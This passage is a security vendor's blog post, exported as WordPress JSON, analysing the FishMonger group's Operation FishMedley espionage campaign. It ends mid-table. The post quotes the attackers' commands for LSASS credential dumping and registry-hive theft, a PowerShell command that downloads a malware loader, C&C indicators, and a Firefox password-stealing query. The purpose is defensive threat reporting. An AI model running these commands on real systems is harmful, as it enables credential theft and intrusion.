{"id":8736,"date":"2025-03-20T12:00:00","date_gmt":"2025-03-20T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=8736"},"modified":"2026-06-14T19:46:56","modified_gmt":"2026-06-14T16:46:56","slug":"operation-fishmedley-targeting-governments-ngos-and-think-tanks","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/ru\/2025\/03\/20\/operation-fishmedley-targeting-governments-ngos-and-think-tanks\/","title":{"rendered":"Operation FishMedley targeting governments, NGOs, and think tanks"},"content":{"rendered":"<p>On March 5<sup>th<\/sup>, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I\u2011SOON for their involvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 including the compromise of seven organizations that we identified as being targeted in a 2022 campaign that we named Operation FishMedley.<\/p>\n<blockquote>\n<div><strong>Key points of this blogpost:<\/strong><\/div>\n<ul>\n<li>Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States.<\/li>\n<li>Operators used implants \u2013 such as ShadowPad, SodaMaster, and Spyder \u2013 that are common or exclusive to China-aligned threat actors.<\/li>\n<li>We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.<\/li>\n<li>Independent of the DOJ indictment, we determined that FishMonger is operated by I\u2011SOON.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>FishMonger profile<\/h2>\n<p>FishMonger \u2013 a group believed to be operated by the Chinese contractor I\u2011SOON (see our <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\">Q4 2023-Q1 2024 APT Activity Report<\/a>) \u2013 falls under the Winnti Group umbrella and is most likely 
operating out of China, from the city of Chengdu where I\u2011SOON\u2019s office was <a href=\"https:\/\/substack.com\/home\/post\/p-155672015\">located<\/a>. FishMonger is also known as Earth Lusca, TAG\u201122, Aquatic Panda, or Red Dev 10. We <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">published<\/a> an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic protests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution to FishMonger.<\/p>\n<p>The group is known to operate watering-hole attacks, as reported by <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html\">Trend Micro<\/a>. FishMonger\u2019s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.<\/p>\n<h2>Overview<\/h2>\n<p>On March 5<sup>th<\/sup>, 2025, the US Department of Justice published a <a href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global\">press release<\/a> and unsealed an <a href=\"https:\/\/www.justice.gov\/usao-sdny\/media\/1391751\/dl?inline\">indictment<\/a> against I\u2011SOON employees and officers of China\u2019s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023. The FBI also added those named in the indictment to its <a href=\"https:\/\/www.fbi.gov\/wanted\/cyber\/aquatic-panda-cyber-threat-actors\">\u201cmost wanted\u201d list<\/a> and published a poster, as seen in Figure 1.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 1. Names of FishMonger I-SOON members\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-1.gif\" title=\"Figure 1. Names of FishMonger \/ I-SOON members (source: FBI)\" width=\"\"><figcaption><em>Figure 1. 
Names of FishMonger \/ I\u2011SOON members (source: FBI)<\/em><\/figcaption><\/figure>\n<p>The indictment describes several attacks that are strongly related to what we published in a <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/\">private APT intelligence report<\/a> in early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments, NGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the recently published indictment.<\/p>\n<p>During 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this blogpost and have named that campaign Operation FishMedley.<\/p>\n<h3>FishMonger and I-SOON<\/h3>\n<p>During our research, we were able to independently determine that FishMonger is an espionage team operated by I\u2011SOON, a Chinese contractor based in Chengdu that suffered an infamous document leak in 2024 \u2013 see this comprehensive analysis from <a href=\"https:\/\/harfanglab.io\/insidethelab\/isoon-leak-analysis\/\">Harfang Labs<\/a>.<\/p>\n<h3>Victimology<\/h3>\n<p>Table 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious interest to the Chinese government.<\/p>\n<p><em>Table 1. 
Victimology details<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"75\"><strong>Victim<\/strong><\/td>\n<td width=\"161\"><strong>Date of compromise<\/strong><\/td>\n<td width=\"123\"><strong>Country<\/strong><\/td>\n<td width=\"262\"><strong>Vertical<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"75\"><strong>A<\/strong><\/td>\n<td width=\"161\">January 2022<\/td>\n<td width=\"123\">Taiwan<\/td>\n<td width=\"262\">Governmental organization.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>B<\/strong><\/td>\n<td width=\"161\">January 2022<\/td>\n<td width=\"123\">Hungary<\/td>\n<td width=\"262\">Catholic organization.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>C<\/strong><\/td>\n<td width=\"161\">February 2022<\/td>\n<td width=\"123\">Turkey<\/td>\n<td width=\"262\">Unknown.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>D<\/strong><\/td>\n<td width=\"161\">March 2022<\/td>\n<td width=\"123\">Thailand<\/td>\n<td width=\"262\">Governmental organization.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>E<\/strong><\/td>\n<td width=\"161\">April 2022<\/td>\n<td width=\"123\">United States<\/td>\n<td width=\"262\">Catholic charity operating worldwide.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>F<\/strong><\/td>\n<td width=\"161\">June 2022<\/td>\n<td width=\"123\">United States<\/td>\n<td width=\"262\">NGO \u2013 mainly active in Asia.<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>G<\/strong><\/td>\n<td width=\"161\">October 2022<\/td>\n<td width=\"123\">France<\/td>\n<td width=\"262\">Geopolitical think tank.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 2 summarizes the implants used during each intrusion of Operation FishMedley.<\/p>\n<p><em>Table 2. 
Details of the implants used against each victim<\/em><\/p>\n<div>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td><strong>Victim | Tool<\/strong><\/td>\n<td><strong>ScatterBee-packed ShadowPad<\/strong><\/td>\n<td><strong>Spyder<\/strong><\/td>\n<td><strong>SodaMaster<\/strong><\/td>\n<td><strong>RPipeCommander<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"144\"><strong>A<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>B<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>C<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>D<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>E<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>F<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>G<\/strong><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2>Technical analysis<\/h2>\n<h3>Initial access<\/h3>\n<p>We were unable to identify the initial compromise vectors. 
For most cases, the attackers seemed to have had privileged access inside the local network, such as domain administrator credentials.<\/p>\n<p>At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials that allowed them to connect to the console.<\/p>\n<p>At Victim F, the implants were delivered using <a href=\"https:\/\/github.com\/fortra\/impacket\">Impacket<\/a>, which means that the attackers somehow previously compromised a high-privilege domain account.<\/p>\n<h3>Lateral movement<\/h3>\n<p>At Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and installed implants.<\/p>\n<p>Table 3 shows that the operators first did some manual reconnaissance using <span>quser.exe<\/span>, <span>wmic.exe<\/span>, and <span>ipconfig.exe<\/span>. Then they tried to get credentials and other secrets by <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/05\/detecting-and-preventing-lsass-credential-dumping-attacks\/\">dumping<\/a> the local security authority subsystem service (LSASS) process (PID 944). The PID of the process was obtained via <span>tasklist \/svc<\/span> and the dump was performed using <span>comsvcs.dll<\/span>, which is a known living-off-the-land binary (<a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Libraries\/comsvcs\/\">LOLBIN<\/a>). Note that it is likely that the attackers executed <span>quser.exe<\/span> to see whether other users or admins were also logged in, meaning privileged accesses were present in LSASS. 
According to <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/quser\">Microsoft documentation<\/a>, to use this command the attacker must have Full Control permission or special access permission.<\/p>\n<p>They also saved the registry hives <span>sam.hive<\/span> and <span>system.hive<\/span>, which can both contain secrets or credentials.<\/p>\n<p>Finally, they tried to dump the LSASS process again, using a <span>for<\/span> loop iterating over the output from <span>tasklist.exe<\/span>. We have seen this same code used on other machines, so it is a good idea to block or at least alert on it.<\/p>\n<p><em>Table 3. Commands executed via Impacket on a machine at Victim F<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"141\"><strong>Timestamp (UTC)<\/strong><\/td>\n<td width=\"501\"><strong>Command<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"141\">2022-06-21 07:34:07<\/td>\n<td width=\"501\"><span>quser<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>wmic os get lastbootuptime<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>ipconfig \/all<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>tasklist \/svc<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c &quot;C:\\Windows\\System32\\rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 944 c:\\users\\public\\music\\temp.tmp full&quot;<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklm\\sam C:\\users\\public\\music\\sam.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklm\\system C:\\users\\public\\music\\system.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>net user<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:05:37<\/td>\n<td width=\"501\"><span>tasklist \/v<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:07:33<\/td>\n<td width=\"501\"><span>dir c:\\users<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 09:47:52<\/td>\n<td width=\"501\"><span>for \/f &quot;tokens=1,2 delims= &quot; ^%A in ('&quot;tasklist \/fi &quot;Imagename eq lsass.exe&quot; | find &quot;lsass&quot;&quot;') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B \\Windows\\Temp\\YDWS6P.xml full<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Toolset<\/h3>\n<h4>ShadowPad<\/h4>\n<p>ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups, including <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">FishMonger<\/a> and <a href=\"https:\/\/www.welivesecurity.com\/2021\/08\/24\/sidewalk-may-be-as-dangerous-as-crosswalk\/\">SparklingGoblin<\/a>, as documented by <a href=\"https:\/\/assets.sentinelone.com\/c\/Shadowpad?x=P42eqA#page=1\">SentinelOne<\/a>. 
In Operation FishMedley, the attackers used a ShadowPad version packed with <a href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\">ScatterBee<\/a>.<\/p>\n<p>At Victim D, the loader was downloaded using the following PowerShell command:<\/p>\n<p><span>powershell (new-object System.Net.WebClient).DownloadFile(&quot;http:\/\/&lt;victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/log.dll&quot;,&quot;c:\\users\\public\\log.dll&quot;)<\/span><\/p>\n<p>This shows that the attackers compromised a web server at the victim\u2019s organization to use it as a staging server for their malware.<\/p>\n<p>At Victim F, Firefox was used to download the loader, from <span>http:\/\/5.188.230[.]47\/log.dll<\/span>. We don\u2019t know whether the attackers had interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the victim was redirected to the download page, say via a watering-hole attack.<\/p>\n<p><span>log.dll<\/span> is side-loaded by an old Bitdefender executable (original name: <span>BDReinit.exe<\/span>) and loads ShadowPad from a file named <span>log.dll.dat<\/span>, which can be decrypted using the scripts provided in PwC\u2019s <a href=\"https:\/\/github.com\/PwCUK-CTO\/ScatterBee_Analysis\">GitHub<\/a> repository.<\/p>\n<p>We did not recover the <span>log.dll.dat<\/span> from the victim\u2019s machine, but we found a fake Adobe Flash installer on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9447B75AF497E5A7F99F1DED1C1D87C53B5B59FCE224A325932AD55EEF9E0E4A\">VirusTotal<\/a> with the identical <span>log.dll<\/span> file. The configuration of the ShadowPad payload is provided in Table 4.<\/p>\n<p><em>Table 4. 
ShadowPad configuration<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Field<\/strong><\/td>\n<td width=\"444\"><strong>Decrypted value<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><strong>Timestamp<\/strong><\/td>\n<td width=\"444\"><span>3\/14\/2022 10:52:16 PM<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Campaign code<\/strong><\/td>\n<td width=\"444\"><span>2203<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>File path<\/strong><\/td>\n<td width=\"444\"><span>%ALLUSERSPROFILE%\\DRMTest<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Spoofed name<\/strong><\/td>\n<td width=\"444\"><span>Test.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Loader filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Payload filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll.dat<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Registry key path<\/strong><\/td>\n<td width=\"444\"><span>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service description<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Program to inject into<\/strong><\/td>\n<td width=\"444\"><span>%ProgramFiles%\\Windows Media Player\\wmplayer.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative 
injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>%windir%\\system32\\svchost.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>TCP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>UDP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4\\n\\n\\n\\n\\n<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4\\n\\n\\n\\n\\n<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5\\n\\n\\n\\n\\n<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5\\n\\n\\n\\n\\n<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Note that from March 20<sup>th<\/sup>, 2022 to November 2<sup>nd<\/sup>, 2022, the C&amp;C domain resolved to <span>213.59.118[.]124<\/span>, which is mentioned in a VMware <a href=\"https:\/\/blogs.vmware.com\/security\/2022\/10\/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html\">blogpost<\/a> about ShadowPad.<\/p>\n<h4>Spyder<\/h4>\n<p>At Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in great detail by <a href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2021\/march\/BackDoor.Spyder.1_en.pdf\">Dr.Web<\/a>.<\/p>\n<p>A Spyder loader was downloaded 
from <span>http:\/\/&lt;a_victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/aa.doc<\/span> and dropped to <span>C:\\Users\\Public\\task.exe<\/span> around 18 hours after ShadowPad was installed.<\/p>\n<p>The loader \u2013 see Figure 2 \u2013 reads the file <span>c:\\windows\\temp\\guid.dat<\/span> and decrypts its contents using AES-CBC. The encryption key is hardcoded: <span>F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00<\/span>. The initialization vector (IV) is the first eight bytes of the key. Unfortunately, we were unable to recover the <span>guid.dat<\/span> file.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Spyder loader\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-2.png\" title=\"Figure 2. Spyder loader\" width=\"\"><figcaption><em>Figure 2. Spyder loader<\/em><\/figcaption><\/figure>\n<p>Then, the loader injects the decoded content \u2013 likely shellcode \u2013 into itself (the <span>task.exe<\/span> process), as seen in Figure 3.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. Spyder loader \u2013 injection part\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-3.png\" title=\"Figure 3. Spyder loader \u2013 injection part\" width=\"\"><figcaption><em>Figure 3. Spyder loader \u2013 injection part<\/em><\/figcaption><\/figure>\n<p>Despite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory, and it was almost identical to the Spyder variant documented by Dr.Web. The C&amp;C server was hardcoded to <span>61.238.103[.]165<\/span>.<\/p>\n<p>Interestingly, multiple subdomains of <span>junlper[.]com<\/span>, a known Spyder C&amp;C domain and a weak homoglyph domain to <span>juniper.net<\/span>, resolved to <span>61.238.103[.]165<\/span> in 2022.<\/p>\n<p>A self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint <span>89EDCFFC66EDA3AEB75E140816702F9AC73A75F0<\/span>. 
According to <a href=\"https:\/\/github.com\/SentineLabs\/Shadowpad\/blob\/main\/technical-indicators\">SentinelOne<\/a>, it is a certificate used by FishMonger for its C&amp;C servers.<\/p>\n<h4>SodaMaster<\/h4>\n<p>SodaMaster is a backdoor that was documented by <a href=\"https:\/\/securelist.com\/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign\/101519\/\">Kaspersky<\/a> in 2021. APT10 was the first group known to have access to this backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.<\/p>\n<p>SodaMaster can only be found decrypted in memory and that\u2019s where we detected it. Even though we did not recover the full loading chain, we have identified a few samples that are the first step of the chain.<\/p>\n<h5>SodaMaster loaders<\/h5>\n<p>We found six different malicious DLLs that are abusing legitimate executables via <a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\/\">DLL side-loading<\/a>. They all implement the same decryption and injection routine.<\/p>\n<p>First, the loader reads a hardcoded file, for example <span>debug.png<\/span>, and XOR decrypts it using a hardcoded 239-byte key. Table 5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the table. Also note that we did not recover any of these encrypted payloads.<\/p>\n<p><em>Table 5. 
SodaMaster loaders<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"170\"><strong>DLL name<\/strong><\/td>\n<td width=\"293\"><strong>Payload filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"170\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;\\debug.png<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"170\"><span>libvlc.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;\\vlc.cnf<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3A702704653EC847CF91<wbr><\/wbr>21E3F454F3DBE1F90AFD<\/span><\/td>\n<td width=\"170\"><span>safestore64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;\\Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"170\"><span>DeElevator64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;\\Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"170\"><span>libmaxminddb-0.dll<\/span><\/td>\n<td width=\"293\"><span>C:\\windows\\system32\\<wbr><\/wbr>MsKeyboardFilterapi.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"170\"><span>safestore641.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;\\Location<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Then, the decrypted buffer is injected into a newly created, suspended <span>svchost.exe<\/span> process \u2013 see Figure 4.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. 
SodaMaster injection\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-4.png\" title=\"Figure 4. SodaMaster injection\" width=\"\"><figcaption><em>Figure 4. SodaMaster injection<\/em><\/figcaption><\/figure>\n<p>Finally, the shellcode is executed using either <span>CreateRemoteThread<\/span> (on Windows XP or older versions) or, on newer Windows versions, via <span>NtCreateThreadEx<\/span> as shown in Figure 5.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. Execution of the injected payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-5.png\" title=\"Figure 5. Execution of the injected payload\" width=\"\"><figcaption><em>Figure 5. Execution of the injected payload<\/em><\/figcaption><\/figure>\n<p>The last four loaders in Table 5 have additional features:<\/p>\n<ul>\n<li>They have an export named <span>getAllAuthData<\/span> that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the query <span>SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins<\/span>.<\/li>\n<li>The last three loaders persist as a service named <span>Netlock<\/span>, <span>MsKeyboardFiltersrv<\/span>, and <span>downmap<\/span>, respectively.<\/li>\n<\/ul>\n<h5>SodaMaster payload<\/h5>\n<p>As mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we\u2019ve found don\u2019t seem to have evolved much. They still implement the same four backdoor commands (<span>d<\/span>, <span>f<\/span>, <span>l<\/span>, and <span>s<\/span>) that were present in 2021.<\/p>\n<p>Table 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different C&amp;C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.<\/p>\n<p><em>Table 6. 
SodaMaster configuration<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"56\"><strong>Victim<\/strong><\/td>\n<td width=\"142\"><strong>C&amp;C server<\/strong><\/td>\n<td width=\"438\"><strong>RSA key<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"56\"><strong>B<\/strong><\/td>\n<td width=\"142\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>C<\/strong><\/td>\n<td width=\"142\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>F<\/strong><\/td>\n<td width=\"142\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj<wbr><\/wbr>Uk3e+\/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm\/JIK+7b<wbr><\/wbr>XikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H<wbr><\/wbr>ygzq19AgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>G<\/strong><\/td>\n<td 